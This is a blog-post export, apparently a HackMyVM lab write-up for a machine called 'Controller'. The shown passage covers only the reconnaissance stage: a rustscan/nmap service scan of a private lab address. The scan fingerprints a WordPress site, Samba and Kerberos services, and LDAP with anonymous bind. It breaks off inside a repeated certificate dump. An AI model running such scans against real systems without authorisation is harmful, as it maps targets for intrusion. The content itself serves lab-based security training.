{"id":795,"date":"2024-09-05T14:11:42","date_gmt":"2024-09-05T06:11:42","guid":{"rendered":"http:\/\/162.14.82.114\/?p=795"},"modified":"2024-09-05T14:11:42","modified_gmt":"2024-09-05T06:11:42","slug":"hmv-_-controller","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/795\/09\/05\/2024\/","title":{"rendered":"hmv[-_-]Controller"},"content":{"rendered":"<h1>Controller<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410540.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410540.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240903190058897\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410541.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409051410541.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240905111120467\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\nOpen 192.168.10.101:88\nOpen 192.168.10.101:135\nOpen 192.168.10.101:139\nOpen 192.168.10.101:389\nOpen 192.168.10.101:443\nOpen 192.168.10.101:445\nOpen 192.168.10.101:464\nOpen 192.168.10.101:636\nOpen 192.168.10.101:3268\nOpen 192.168.10.101:3269\nOpen 192.168.10.101:49153\nOpen 192.168.10.101:49152\nOpen 192.168.10.101:49154\n\nPORT      STATE SERVICE      REASON  VERSION\n22\/tcp    open  ssh          syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 73:a1:2c:d9:47:5c:18:0b:68:60:02:58:f9:a2:c4:18 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC77ke\/V3ttGgim+K7soPIqpp2a+EYuyBXu2w0RqblsrXOSnnM3+10dHaajGskajqcn4UjK5E2ZcST+Pz9lN5pMk3QTtIf4XVEqPLPH6Cz2W0bZ5D5rgOItqqN4uIsAdb5tPJDqF1gbl\/7jv++6GrCSEqbNEzAuD0gGs+tIxa4\/rjz0XTaQdrxaERyn2GwHBGcxgw2v4Y4G9DaXoc42O1d\/AI0v40KVl8mvF+v3wpCHuznu7yyhuC4rj+EdCKCMM194Db9bHZAZtvqPInAEJOsiRBpNuhHTjGj6TeHjPCeQ83QQJ5KnQN\/Ezsh9CeH+ZWlLUd0kSkXL3nf+P\/Cb70NO3bq85jhOHcpVLC8R6P+HjWQLsYQ9bCVJO1vG1h1uYwHmZJjNQ8j8TE1\/8E7+eOBe0Ho9\/906VupHfWR\/Mrx6o4T7xzgWFYVglabR1zKqbsXt47MCpZSpDSbW0yFOikNN6Wj1vB+xTwyzUeM0uJE1Y\/LlLhfOlThrWGOlI2xHzwE=\n|   256 2d:51:0e:a5:af:b2:b1:36:5b:93:6c:d2:17:a3:39:4c (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAdUtppvvCyWTDAfhnHVAli0c4AyepKxdOFTh6x6oO1uVwCb2s4d0rdgMGNORaBhIf7LPwR5BAKLeSiRAyIWWCY=\n|   256 d0:bb:81:c4:16:aa:28:af:68:f5:38:7d:af:9f:4a:5b (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAID1QLoQ1uk2sPbhqpdeYW1rv7HKlers4sS+7TbXNlZ6h\n80\/tcp    open  http         syn-ack Apache httpd 2.4.41 ((Ubuntu))\n|_http-title: CONTROLLER &amp;#8211; Otro sitio realizado con WordPress\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n|_http-generator: WordPress 5.7.2\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n88\/tcp    open  kerberos-sec syn-ack Heimdal Kerberos (server time: 2024-09-05 03:11:57Z)\n135\/tcp   open  msrpc        syn-ack Microsoft Windows RPC\n139\/tcp   open  netbios-ssn  syn-ack Samba smbd 4.6.2\n389\/tcp   open  ldap         syn-ack (Anonymous bind OK)\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated HOST certificate\n| Issuer: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated CA certificate\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-06-27T17:19:10\n| Not valid after:  2023-05-28T17:19:10\n| MD5:   2f18:e07a:ba20:8bf3:74c9:9c79:386b:53eb\n| SHA-1: b79a:aab3:dd81:3d7b:f578:a0dc:e737:cdb1:09ec:f011\n| -----BEGIN CERTIFICATE-----\n| MIIFwTCCA6mgAwIBAgIEDrPYYDANBgkqhkiG9w0BAQsFADB+MR0wGwYDVQQKExRT\n| YW1iYSBBZG1pbmlzdHJhdGlvbjE3MDUGA1UECxMuU2FtYmEgLSB0ZW1wb3Jhcnkg\n| YXV0b2dlbmVyYXRlZCBDQSBjZXJ0aWZpY2F0ZTEkMCIGA1UEAxMbQ09OVFJPTExF\n| Ui5jb250cm9sbGVyLmxvY2FsMB4XDTIxMDYyNzE3MTkxMFoXDTIzMDUyODE3MTkx\n| MFowgYAxHTAbBgNVBAoTFFNhbWJhIEFkbWluaXN0cmF0aW9uMTkwNwYDVQQLEzBT\n| YW1iYSAtIHRlbXBvcmFyeSBhdXRvZ2VuZXJhdGVkIEhPU1QgY2VydGlmaWNhdGUx\n| JDAiBgNVBAMTG0NPTlRST0xMRVIuY29udHJvbGxlci5sb2NhbDCCAiIwDQYJKoZI\n| hvcNAQEBBQADggIPADCCAgoCggIBANX2nII0mTXyotfhizuRWOiX38+tol1Zld\/D\n| \/8srPjJnMm6sfDjyU+7bnPFKFbxxYYXQtJxq7cgO9TgWzoA1Lw3TPLG3Z9gKv6gq\n| l2jftA\/VRHXhoe7GONG+3DSYyNuqo0+eEngPx1CqwyhR\/N2MZerV3wgoOnLcRL5R\n| ALFYOHxaqXoJZrmxx\/pMQQ5w+PSQk9rAHvLcZb3BJs+PSK8Y2AyI+RAmpV9RrJuY\n| LaEothKj71zdIC+duNUD7C\/PCU5tgVm0PwtktEBZ99SiyRnokrv9k8x\/v\/Pj66Cy\n| KaVnRfj86GamIssJ0\/8Rc2EX20\/eyyvx42VI1HeVNoIdqsufItOyxDCs8hdng4sg\n| W75FZ\/\/FwHSsuqh2O5TboQMomnFdXO7dsBUZKvcN5Pzoco0xV0nvtPmsj\/WLUcUx\n| QrdtrCHSnuyX4+d0IG0qpQdi5\/ie72by13fCeg8RyLE\/Kc4CWsZmpC0e8sG2xKKe\n| KSoCJYdZVAE33UTdfbenLKfq\/E8y8EAjPiOV01s8Y9INqn0xWH6AKj\/HLSIKPMkm\n| nrgjhQ5sE9hLABziqRv1Du9NsWVNdrv92X4LrGCPjlIP0hXjLY7JC6IpLWERQ7Yk\n| UWKppFRFDA30sb5hxZYl4vpaGLB+cB2PXAeLKW50sHS8bJDnUsDl8HEuvtEpqFQc\n| efZI2G6tAgMBAAGjRDBCMAwGA1UdEwEB\/wQCMAAwEwYDVR0lBAwwCgYIKwYBBQUH\n| AwEwHQYDVR0OBBYEFPvUu+RAukl7VCb8qdF5cUv9BmC1MA0GCSqGSIb3DQEBCwUA\n| A4ICAQA7opKmMCaWkfJfmnCZBCJcWRTTdVnXseFxSchMMPjtOqPp8Zgk4Kf+JZbM\n| +0FSpg2\/UHu6W5OWVeefD\/stBdacwRN4nR2ipadnCyg8Tmo6dqJUaAx0pIwjWxAX\n| oj5OVXTrjh3u2rW4J\/gbh1d5S3\/m1p6x0q3ZCKD7NIlPfspuMFTstC+oC3A+PAkd\n| NkPJWjcgUcUrV7R5F9OKEWA+IuQRUKMvqT6KbKs\/KhNaTFXfNbYhegVlWNtK5xq\/\n| 9dbnv+EWVWWBGELztqukGkAmDSEV6JIdT69rkjxagHXp9lxaxuFehhKftvCilAQl\n| D3EGuONkooGqyJyTXa+fuM1lRdWFI1o+GSNzDnBEJF0RrErcmS1MOVk13uOmPXLD\n| md9CT5pKEkZuHG7XUt6di8PaJgd6Zhd2IJC8ZCUbGEfeaDDYNNAuu+EqMQlckMfO\n| OcyWwmMN1oTS27\/aSlVdi4EpQWGHx4GlwcfLFoZRUiFzLLHYVu0EZzQ+NefWa16a\n| 7Oq0hYp\/D8vU8lWqgrFo8nToejP5ejwP8poO7+nTmrWCnbjDfB86DF9dvgvA0W8V\n| iUkEQicyX+XBq\/pM1Q4z3bPZQyJ8ZSxJy+yt9WgD6k6yNGNzmPR5iNlqNh4h7NmZ\n| khp99Hd2Ztlmgfy73EvaVMiNZFZeHwPGD6F8BG82jwNhhi73Vg==\n|_-----END CERTIFICATE-----\n443\/tcp   open  ssl\/http     syn-ack Apache httpd 2.4.41 ((Ubuntu))\n| ssl-cert: Subject: organizationName=CONTROLLER\/stateOrProvinceName=Some-State\/countryName=AU\/emailAddress=admin@controller.local\n| Issuer: organizationName=CONTROLLER\/stateOrProvinceName=Some-State\/countryName=AU\/emailAddress=admin@controller.local\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-06-27T17:44:27\n| Not valid after:  2022-06-27T17:44:27\n| MD5:   448b:e3c3:423d:02dc:2018:9af6:a2ea:f26b\n| SHA-1: ecb8:c338:f6ed:052b:f857:0b4d:30b1:3cf5:f2d0:1df5\n| -----BEGIN CERTIFICATE-----\n| MIIDnTCCAoWgAwIBAgIUbo2iGZrkCEn5swmerlQPfHiEfsIwDQYJKoZIhvcNAQEL\n| BQAwXjELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxEzARBgNVBAoM\n| CkNPTlRST0xMRVIxJTAjBgkqhkiG9w0BCQEWFmFkbWluQGNvbnRyb2xsZXIubG9j\n| YWwwHhcNMjEwNjI3MTc0NDI3WhcNMjIwNjI3MTc0NDI3WjBeMQswCQYDVQQGEwJB\n| VTETMBEGA1UECAwKU29tZS1TdGF0ZTETMBEGA1UECgwKQ09OVFJPTExFUjElMCMG\n| CSqGSIb3DQEJARYWYWRtaW5AY29udHJvbGxlci5sb2NhbDCCASIwDQYJKoZIhvcN\n| AQEBBQADggEPADCCAQoCggEBALnMYAE1YEge4idEyZz2QO2ZH7Fkw6WZBHYhSgom\n| YYxh9dOm7JGpQPs5ms\/p\/9R5mW4EFDsvj2AaJ4M66A8Jz7yFQfDm0FOXUSnDb8\/9\n| tvmtynya+lkaMbc\/kBRdVCrOYhZiwNhel9ULs8E3eGtAR31KNeIGq7KO+rfyYTbV\n| YNRAhqoTfuYuEkLMjqGqJXeqwyg5+U6xVuRphTu1mY8Q\/Aya2h2ZS\/G1SL0TqI5T\n| teP2kg5rIi3qATgYFOpAMEL9kT6t98srSa97Sgd3MPm9R\/xhGyGlzrM47C7HTY8b\n| v3o9NK5oP3WY2W\/6vAGOIqsD1rYqQGgX9WPFQ2XbFWM8CLsCAwEAAaNTMFEwHQYD\n| VR0OBBYEFA\/hxV8NXRkX59khwf7ugvYZRo4XMB8GA1UdIwQYMBaAFA\/hxV8NXRkX\n| 59khwf7ugvYZRo4XMA8GA1UdEwEB\/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEB\n| AA+XOmqmTiRBbcHM+i2HLp4t2p6xrAhlAmHo+YNzRY\/HLU+Km5Zp7yR96cv5HjM8\n| wfuszTW2MioCHo2hFZazdxo1V4LkIYr\/9RHLVUO3AoxIUyQJ960O7NYxdo2+14oG\n| jJYBXY2jGpuTqtl+rSMS\/9R1Ob7C1qF4W9hPuT3qw\/XTOla6N5t3zcpsKL2K4zUb\n| tili\/ng5ZQAVChRCncUA7pSrCIjZrEFnlA0+A5N7Q5hYy52xqvHdlwXWyvVp6P3F\n| vBzkYWtrZVGjE+y4aL51X5Wq2Jsh\/68lNV8ysY9pYqDgYberBglR0XDfk0Je3s3+\n| 2pa5oxComZ+a8+3YWFL2NG4=\n|_-----END CERTIFICATE-----\n|_http-generator: WordPress 5.7.2\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n|_http-title: CONTROLLER &amp;#8211; Otro sitio realizado con WordPress\n| tls-alpn: \n|_  http\/1.1\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_ssl-date: TLS randomness does not represent time\n445\/tcp   open  netbios-ssn  syn-ack Samba smbd 4.6.2\n464\/tcp   open  kpasswd5?    syn-ack\n636\/tcp   open  ssl\/ldap     syn-ack (Anonymous bind OK)\n| ssl-cert: Subject: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated HOST certificate\n| Issuer: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated CA certificate\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-06-27T17:19:10\n| Not valid after:  2023-05-28T17:19:10\n| MD5:   2f18:e07a:ba20:8bf3:74c9:9c79:386b:53eb\n| SHA-1: b79a:aab3:dd81:3d7b:f578:a0dc:e737:cdb1:09ec:f011\n| -----BEGIN CERTIFICATE-----\n| MIIFwTCCA6mgAwIBAgIEDrPYYDANBgkqhkiG9w0BAQsFADB+MR0wGwYDVQQKExRT\n| YW1iYSBBZG1pbmlzdHJhdGlvbjE3MDUGA1UECxMuU2FtYmEgLSB0ZW1wb3Jhcnkg\n| YXV0b2dlbmVyYXRlZCBDQSBjZXJ0aWZpY2F0ZTEkMCIGA1UEAxMbQ09OVFJPTExF\n| Ui5jb250cm9sbGVyLmxvY2FsMB4XDTIxMDYyNzE3MTkxMFoXDTIzMDUyODE3MTkx\n| MFowgYAxHTAbBgNVBAoTFFNhbWJhIEFkbWluaXN0cmF0aW9uMTkwNwYDVQQLEzBT\n| YW1iYSAtIHRlbXBvcmFyeSBhdXRvZ2VuZXJhdGVkIEhPU1QgY2VydGlmaWNhdGUx\n| JDAiBgNVBAMTG0NPTlRST0xMRVIuY29udHJvbGxlci5sb2NhbDCCAiIwDQYJKoZI\n| hvcNAQEBBQADggIPADCCAgoCggIBANX2nII0mTXyotfhizuRWOiX38+tol1Zld\/D\n| \/8srPjJnMm6sfDjyU+7bnPFKFbxxYYXQtJxq7cgO9TgWzoA1Lw3TPLG3Z9gKv6gq\n| l2jftA\/VRHXhoe7GONG+3DSYyNuqo0+eEngPx1CqwyhR\/N2MZerV3wgoOnLcRL5R\n| ALFYOHxaqXoJZrmxx\/pMQQ5w+PSQk9rAHvLcZb3BJs+PSK8Y2AyI+RAmpV9RrJuY\n| LaEothKj71zdIC+duNUD7C\/PCU5tgVm0PwtktEBZ99SiyRnokrv9k8x\/v\/Pj66Cy\n| KaVnRfj86GamIssJ0\/8Rc2EX20\/eyyvx42VI1HeVNoIdqsufItOyxDCs8hdng4sg\n| W75FZ\/\/FwHSsuqh2O5TboQMomnFdXO7dsBUZKvcN5Pzoco0xV0nvtPmsj\/WLUcUx\n| QrdtrCHSnuyX4+d0IG0qpQdi5\/ie72by13fCeg8RyLE\/Kc4CWsZmpC0e8sG2xKKe\n| KSoCJYdZVAE33UTdfbenLKfq\/E8y8EAjPiOV01s8Y9INqn0xWH6AKj\/HLSIKPMkm\n| nrgjhQ5sE9hLABziqRv1Du9NsWVNdrv92X4LrGCPjlIP0hXjLY7JC6IpLWERQ7Yk\n| UWKppFRFDA30sb5hxZYl4vpaGLB+cB2PXAeLKW50sHS8bJDnUsDl8HEuvtEpqFQc\n| efZI2G6tAgMBAAGjRDBCMAwGA1UdEwEB\/wQCMAAwEwYDVR0lBAwwCgYIKwYBBQUH\n| AwEwHQYDVR0OBBYEFPvUu+RAukl7VCb8qdF5cUv9BmC1MA0GCSqGSIb3DQEBCwUA\n| A4ICAQA7opKmMCaWkfJfmnCZBCJcWRTTdVnXseFxSchMMPjtOqPp8Zgk4Kf+JZbM\n| +0FSpg2\/UHu6W5OWVeefD\/stBdacwRN4nR2ipadnCyg8Tmo6dqJUaAx0pIwjWxAX\n| oj5OVXTrjh3u2rW4J\/gbh1d5S3\/m1p6x0q3ZCKD7NIlPfspuMFTstC+oC3A+PAkd\n| NkPJWjcgUcUrV7R5F9OKEWA+IuQRUKMvqT6KbKs\/KhNaTFXfNbYhegVlWNtK5xq\/\n| 9dbnv+EWVWWBGELztqukGkAmDSEV6JIdT69rkjxagHXp9lxaxuFehhKftvCilAQl\n| D3EGuONkooGqyJyTXa+fuM1lRdWFI1o+GSNzDnBEJF0RrErcmS1MOVk13uOmPXLD\n| md9CT5pKEkZuHG7XUt6di8PaJgd6Zhd2IJC8ZCUbGEfeaDDYNNAuu+EqMQlckMfO\n| OcyWwmMN1oTS27\/aSlVdi4EpQWGHx4GlwcfLFoZRUiFzLLHYVu0EZzQ+NefWa16a\n| 7Oq0hYp\/D8vU8lWqgrFo8nToejP5ejwP8poO7+nTmrWCnbjDfB86DF9dvgvA0W8V\n| iUkEQicyX+XBq\/pM1Q4z3bPZQyJ8ZSxJy+yt9WgD6k6yNGNzmPR5iNlqNh4h7NmZ\n| khp99Hd2Ztlmgfy73EvaVMiNZFZeHwPGD6F8BG82jwNhhi73Vg==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n3268\/tcp  open  ldap         syn-ack (Anonymous bind OK)\n| ssl-cert: Subject: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated HOST certificate\n| Issuer: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated CA certificate\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-06-27T17:19:10\n| Not valid after:  2023-05-28T17:19:10\n| MD5:   2f18:e07a:ba20:8bf3:74c9:9c79:386b:53eb\n| SHA-1: b79a:aab3:dd81:3d7b:f578:a0dc:e737:cdb1:09ec:f011\n| -----BEGIN CERTIFICATE-----\n| MIIFwTCCA6mgAwIBAgIEDrPYYDANBgkqhkiG9w0BAQsFADB+MR0wGwYDVQQKExRT\n| YW1iYSBBZG1pbmlzdHJhdGlvbjE3MDUGA1UECxMuU2FtYmEgLSB0ZW1wb3Jhcnkg\n| YXV0b2dlbmVyYXRlZCBDQSBjZXJ0aWZpY2F0ZTEkMCIGA1UEAxMbQ09OVFJPTExF\n| Ui5jb250cm9sbGVyLmxvY2FsMB4XDTIxMDYyNzE3MTkxMFoXDTIzMDUyODE3MTkx\n| MFowgYAxHTAbBgNVBAoTFFNhbWJhIEFkbWluaXN0cmF0aW9uMTkwNwYDVQQLEzBT\n| YW1iYSAtIHRlbXBvcmFyeSBhdXRvZ2VuZXJhdGVkIEhPU1QgY2VydGlmaWNhdGUx\n| JDAiBgNVBAMTG0NPTlRST0xMRVIuY29udHJvbGxlci5sb2NhbDCCAiIwDQYJKoZI\n| hvcNAQEBBQADggIPADCCAgoCggIBANX2nII0mTXyotfhizuRWOiX38+tol1Zld\/D\n| \/8srPjJnMm6sfDjyU+7bnPFKFbxxYYXQtJxq7cgO9TgWzoA1Lw3TPLG3Z9gKv6gq\n| l2jftA\/VRHXhoe7GONG+3DSYyNuqo0+eEngPx1CqwyhR\/N2MZerV3wgoOnLcRL5R\n| ALFYOHxaqXoJZrmxx\/pMQQ5w+PSQk9rAHvLcZb3BJs+PSK8Y2AyI+RAmpV9RrJuY\n| LaEothKj71zdIC+duNUD7C\/PCU5tgVm0PwtktEBZ99SiyRnokrv9k8x\/v\/Pj66Cy\n| KaVnRfj86GamIssJ0\/8Rc2EX20\/eyyvx42VI1HeVNoIdqsufItOyxDCs8hdng4sg\n| W75FZ\/\/FwHSsuqh2O5TboQMomnFdXO7dsBUZKvcN5Pzoco0xV0nvtPmsj\/WLUcUx\n| QrdtrCHSnuyX4+d0IG0qpQdi5\/ie72by13fCeg8RyLE\/Kc4CWsZmpC0e8sG2xKKe\n| KSoCJYdZVAE33UTdfbenLKfq\/E8y8EAjPiOV01s8Y9INqn0xWH6AKj\/HLSIKPMkm\n| nrgjhQ5sE9hLABziqRv1Du9NsWVNdrv92X4LrGCPjlIP0hXjLY7JC6IpLWERQ7Yk\n| UWKppFRFDA30sb5hxZYl4vpaGLB+cB2PXAeLKW50sHS8bJDnUsDl8HEuvtEpqFQc\n| efZI2G6tAgMBAAGjRDBCMAwGA1UdEwEB\/wQCMAAwEwYDVR0lBAwwCgYIKwYBBQUH\n| AwEwHQYDVR0OBBYEFPvUu+RAukl7VCb8qdF5cUv9BmC1MA0GCSqGSIb3DQEBCwUA\n| A4ICAQA7opKmMCaWkfJfmnCZBCJcWRTTdVnXseFxSchMMPjtOqPp8Zgk4Kf+JZbM\n| +0FSpg2\/UHu6W5OWVeefD\/stBdacwRN4nR2ipadnCyg8Tmo6dqJUaAx0pIwjWxAX\n| oj5OVXTrjh3u2rW4J\/gbh1d5S3\/m1p6x0q3ZCKD7NIlPfspuMFTstC+oC3A+PAkd\n| NkPJWjcgUcUrV7R5F9OKEWA+IuQRUKMvqT6KbKs\/KhNaTFXfNbYhegVlWNtK5xq\/\n| 9dbnv+EWVWWBGELztqukGkAmDSEV6JIdT69rkjxagHXp9lxaxuFehhKftvCilAQl\n| D3EGuONkooGqyJyTXa+fuM1lRdWFI1o+GSNzDnBEJF0RrErcmS1MOVk13uOmPXLD\n| md9CT5pKEkZuHG7XUt6di8PaJgd6Zhd2IJC8ZCUbGEfeaDDYNNAuu+EqMQlckMfO\n| OcyWwmMN1oTS27\/aSlVdi4EpQWGHx4GlwcfLFoZRUiFzLLHYVu0EZzQ+NefWa16a\n| 7Oq0hYp\/D8vU8lWqgrFo8nToejP5ejwP8poO7+nTmrWCnbjDfB86DF9dvgvA0W8V\n| iUkEQicyX+XBq\/pM1Q4z3bPZQyJ8ZSxJy+yt9WgD6k6yNGNzmPR5iNlqNh4h7NmZ\n| khp99Hd2Ztlmgfy73EvaVMiNZFZeHwPGD6F8BG82jwNhhi73Vg==\n|_-----END CERTIFICATE-----\n|_ssl-date: TLS randomness does not represent time\n3269\/tcp  open  ssl\/ldap     syn-ack (Anonymous bind OK)\n| ssl-cert: Subject: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated HOST certificate\n| Issuer: commonName=CONTROLLER.controller.local\/organizationName=Samba Administration\/organizationalUnitName=Samba - temporary autogenerated CA certificate\n| Public Key type: rsa\n| Public Key bits: 4096\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-06-27T17:19:10\n| Not valid after:  2023-05-28T17:19:10\n| MD5:   2f18:e07a:ba20:8bf3:74c9:9c79:386b:53eb\n| SHA-1: b79a:aab3:dd81:3d7b:f578:a0dc:e737:cdb1:09ec:f011\n| -----BEGIN CERTIFICATE-----\n| MIIFwTCCA6mgAwIBAgIEDrPYYDANBgkqhkiG9w0BAQsFADB+MR0wGwYDVQQKExRT\n| YW1iYSBBZG1pbmlzdHJhdGlvbjE3MDUGA1UECxMuU2FtYmEgLSB0ZW1wb3Jhcnkg\n| YXV0b2dlbmVyYXRlZCBDQSBjZXJ0aWZpY2F0ZTEkMCIGA1UEAxMbQ09OVFJPTExF\n| Ui5jb250cm9sbGVyLmxvY2FsMB4XDTIxMDYyNzE3MTkxMFoXDTIzMDUyODE3MTkx\n| MFowgYAxHTAbBgNVBAoTFFNhbWJhIEFkbWluaXN0cmF0aW9uMTkwNwYDVQQLEzBT\n| YW1iYSAtIHRlbXBvcmFyeSBhdXRvZ2VuZXJhdGVkIEhPU1QgY2VydGlmaWNhdGUx\n| JDAiBgNVBAMTG0NPTlRST0xMRVIuY29udHJvbGxlci5sb2NhbDCCAiIwDQYJKoZI\n| hvcNAQEBBQADggIPADCCAgoCggIBANX2nII0mTXyotfhizuRWOiX38+tol1Zld\/D\n| \/8srPjJnMm6sfDjyU+7bnPFKFbxxYYXQtJxq7cgO9TgWzoA1Lw3TPLG3Z9gKv6gq\n| l2jftA\/VRHXhoe7GONG+3DSYyNuqo0+eEngPx1CqwyhR\/N2MZerV3wgoOnLcRL5R\n| ALFYOHxaqXoJZrmxx\/pMQQ5w+PSQk9rAHvLcZb3BJs+PSK8Y2AyI+RAmpV9RrJuY\n| LaEothKj71zdIC+duNUD7C\/PCU5tgVm0PwtktEBZ99SiyRnokrv9k8x\/v\/Pj66Cy\n| KaVnRfj86GamIssJ0\/8Rc2EX20\/eyyvx42VI1HeVNoIdqsufItOyxDCs8hdng4sg\n| W75FZ\/\/FwHSsuqh2O5TboQMomnFdXO7dsBUZKvcN5Pzoco0xV0nvtPmsj\/WLUcUx\n| QrdtrCHSnuyX4+d0IG0qpQdi5\/ie72by13fCeg8RyLE\/Kc4CWsZmpC0e8sG2xKKe\n| KSoCJYdZVAE33UTdfbenLKfq\/E8y8EAjPiOV01s8Y9INqn0xWH6AKj\/HLSIKPMkm\n| nrgjhQ5sE9hLABziqRv1Du9NsWVNdrv92X4LrGCPjlIP0hXjLY7JC6IpLWERQ7Yk\n| UWKppFRFDA30sb5hxZYl4vpaGLB+cB2PXAeLKW50sHS8bJDnUsDl8HEuvtEpqFQc\n| efZI2G6tAgMBAAGjRDBCMAwGA1UdEwEB\/wQCMAAwEwYDVR0lBAwwCgYIKwYBBQUH\n| AwEwHQYDVR0OBBYEFPvUu+RAukl7VCb8qdF5cUv9BmC1MA0GCSqGSIb3DQEBCwUA\n| A4ICAQA7opKmMCaWkfJfmnCZBCJcWRTTdVnXseFxSchMMPjtOqPp8Zgk4Kf+JZbM\n| +0FSpg2\/UHu6W5OWVeefD\/stBdacwRN4nR2ipadnCyg8Tmo6dqJUaAx0pIwjWxAX\n| oj5OVXTrjh3u2rW4J\/gbh1d5S3\/m1p6x0q3ZCKD7NIlPfspuMFTstC+oC3A+PAkd\n| NkPJWjcgUcUrV7R5F9OKEWA+IuQRUKMvqT6KbKs\/KhNaTFXfNbYhegVlWNtK5xq\/\n| 9dbnv+EWVWWBGELztqukGkAmDSEV6JIdT69rkjxagHXp9lxaxuFehhKftvCilAQl\n| D3EGuONkooGqyJyTXa+fuM1lRdWFI1o+GSNzDnBEJF0RrErcmS1MOVk13uOmPXLD\n| md9CT5pKEkZuHG7XUt6di8PaJgd6Zhd2IJC8ZCUbGEfeaDDYNNAuu+EqMQlckMfO\n| OcyWwmMN1oTS27\/aSlVdi4EpQWGHx4GlwcfLFoZRUiFzLLHYVu0EZzQ+NefWa16a\n| 7Oq0hYp\/D8vU8lWqgrFo8nToejP5ejwP8poO7+nTmrWCnbjDfB86DF9dvgvA0W8V\n| iUkEQicyX+XBq\/pM1Q4z3bPZQyJ8ZSxJy+yt9WgD6k6yNGNzmPR5iNlqNh4h7NmZ\n| 